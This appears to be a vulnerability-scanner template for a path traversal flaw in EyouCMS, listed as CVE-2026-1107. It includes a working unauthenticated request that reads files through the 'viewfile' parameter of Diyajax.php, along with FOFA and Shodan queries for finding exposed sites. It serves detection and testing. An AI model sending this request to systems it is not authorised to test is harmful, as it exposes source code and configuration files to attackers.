id: CVE-2026-1107

info:
  name: EyouCMS < 1.7.1 - Path Traversal & Arbitrary File Read
  author: Akuivan13
  severity: critical
  description: |
    Detects a critical Path Traversal vulnerability in EyouCMS versions up to 1.7.1.
    The issue exists in the 'check_userinfo' function within 'Diyajax.php', allowing unauthenticated remote attackers to read arbitrary files (Source Code Disclosure) via the 'viewfile' parameter. This often leads to RCE by exposing configuration files or combining with file upload flaws.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1107
    - https://github.com/eyoucms/eyoucms
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-22
  metadata:
    max-request: 1
    fofa-query: body="EyouCms"
    shodan-query: http.html:"EyouCms"
    verified: true
  tags: cve,cve2026,eyoucms,traversal,lfi,fileread,critical

http:
  - raw:
      - |
        POST /index.php?m=api&c=Diyajax&a=check_userinfo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

        aid=1&viewfile=../../index.php

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?php"
          - "define('APP_PATH'"
          - "require __DIR__"
        condition: or

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# Note: This template validates the vulnerability by attempting to read the source code of index.php.
# If successful, it confirms the path traversal flaw without needing to guess random config file locations.